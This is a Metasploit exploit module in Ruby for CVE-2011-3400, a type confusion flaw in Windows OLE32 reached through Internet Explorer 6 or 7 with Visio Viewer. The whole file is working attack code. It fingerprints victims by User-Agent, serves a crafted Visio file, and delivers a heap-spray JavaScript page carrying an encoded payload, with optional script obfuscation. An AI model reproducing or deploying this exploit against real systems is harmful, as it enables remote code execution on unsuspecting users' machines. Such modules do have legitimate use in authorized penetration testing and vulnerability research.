Microsoft Windows OLE Object File Handling Remote Code Execution

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Microsoft Windows OLE Object File Handling Remote Code Execution",  
'Description' => %q{  
This module exploits a type confusion vulnerability in the OLE32 component of  
Windows XP SP3. The vulnerability exists in the CPropertyStorage::ReadMultiple  
function.  
  
A Visio document with a specially crafted Summary Information Stream embedded allows  
to get remote code execution through Internet Explorer, on systems with Visio Viewer  
installed.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Luigi Auriemma', # Vulnerability discovery and PoC  
'juan vazquez' # Metasploit module  
],  
'References' =>  
[  
[ 'CVE', '2011-3400' ],  
[ 'OSVDB', '77663'],  
[ 'BID', '50977' ],  
[ 'URL', 'http://aluigi.org/adv/ole32_1-adv.txt' ],  
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=966' ]  
],  
'Payload' =>  
{  
'Space' => 1000,  
'BadChars' => "\x00",  
'DisableNops' => true  
},  
'DefaultOptions' =>  
{  
'InitialAutoRunScript' => 'migrate -f'  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', {} ],  
[  
'IE 6 on Windows XP SP3 / Visio Viewer 2010',  
{  
'Offset' => '0x7ee - code.length',  
'PtrToHeap' => "\x35\x40" # Pointer from IEXPLORE.exe PE header  
}  
],  
[  
'IE 7 on Windows XP SP3 / Visio Viewer 2010',  
{  
'Offset' => '0x7ee - code.length',  
'PtrToHeap' => "\x35\x40" # Pointer from IEXPLORE.exe PE header  
}  
]  
],  
'Privileged' => false,  
'DisclosureDate' => "Dec 13 2011",  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])  
], self.class)  
  
end  
  
def get_target(agent)  
# If the user is already specified by the user, we'll just use that  
return target if target.name != 'Automatic'  
  
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/  
return targets[1] # IE 6 on Windows XP SP3  
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/  
return targets[2] # IE 7 on Windows XP SP3  
else  
return nil  
end  
end  
  
def exploit  
@vsd = create_vsd  
super  
end  
  
def on_request_uri(cli, request)  
  
agent = request.headers['User-Agent']  
my_target = get_target(agent)  
  
# Avoid the attack if the victim doesn't have the same setup we're targeting  
if my_target.nil?  
print_error("Browser not supported: #{agent}")  
send_not_found(cli)  
return  
end  
  
print_status("Client requesting: #{request.uri}")  
  
if request.uri =~ /\.vsd$/  
@vsd[5106, 2] = my_target['PtrToHeap']  
print_status("Sending Exploit VSD")  
send_response(cli, @vsd, { 'Content-Type' => 'application/vnd.visio' })  
return  
end  
  
p = payload.encoded  
  
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))  
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))  
  
js_pivot = <<-JS  
var heap_obj = new heapLib.ie(0x20000);  
var code = unescape("#{js_code}");  
var nops = unescape("#{js_nops}");  
  
while (nops.length < 0x80000) nops += nops;  
var offset = nops.substring(0, #{my_target['Offset']});  
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);  
  
while (shellcode.length < 0x40000) shellcode += shellcode;  
var block = shellcode.substring(0, (0x80000-6)/2);  
  
heap_obj.gc();  
for (var i=1; i < 0x1e0; i++) {  
heap_obj.alloc(block);  
}  
JS  
  
js_pivot = heaplib(js_pivot, {:noobfu => true})  
  
if datastore['OBFUSCATE']  
js_pivot = ::Rex::Exploitation::JSObfu.new(js_pivot)  
js_pivot.obfuscate  
end  
  
vsd_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource  
vsd_uri << "/#{rand_text_alpha(rand(6)+3)}.vsd"  
  
html = %Q|  
<html>  
<head>  
<script>  
#{js_pivot}  
</script>  
</head>  
<body>  
  
<object classid="clsid:F8CF7A98-2C45-4c8d-9151-2D716989DDAB" ID="target">  
<param name=src value="#{vsd_uri}">  
</object>  
</body>  
</html>  
|  
  
html = html.gsub(/^\t\t/, '')  
  
print_status("Sending html")  
send_response(cli, html, {'Content-Type'=>'text/html'})  
end  
  
def create_vsd  
path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2011-3400", "CVE-2011-3400.vsd" )  
fd = ::File.open( path, "rb" )  
vsd = fd.read(fd.stat.size)  
fd.close  
return vsd  
end  
  
end  
  
`